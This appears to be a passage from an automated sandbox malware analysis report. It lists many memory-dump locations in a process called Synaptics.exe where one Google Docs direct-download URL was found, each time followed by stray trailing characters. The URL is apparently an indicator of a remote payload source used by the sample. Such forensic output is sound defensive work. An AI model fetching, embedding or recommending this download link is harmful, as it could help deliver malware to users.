                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVf
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW5
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWatch
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX0
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXU
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYM
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZDGU
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZx
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026291010.00000000075FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_.
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_0
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadalif
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamad
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadame
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadax
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbYg
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc0
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce.c
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle#
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle-
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleW
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelleh
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellem
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcellj
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.a
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcoz
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dlC
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcted
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcumen
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeN
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded.mo
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellel
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem9
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetleniyor...
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetwf?
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyZ
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo&
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo(
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo0
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoa
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyoe
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyok
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyom
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyow
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderve
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle/
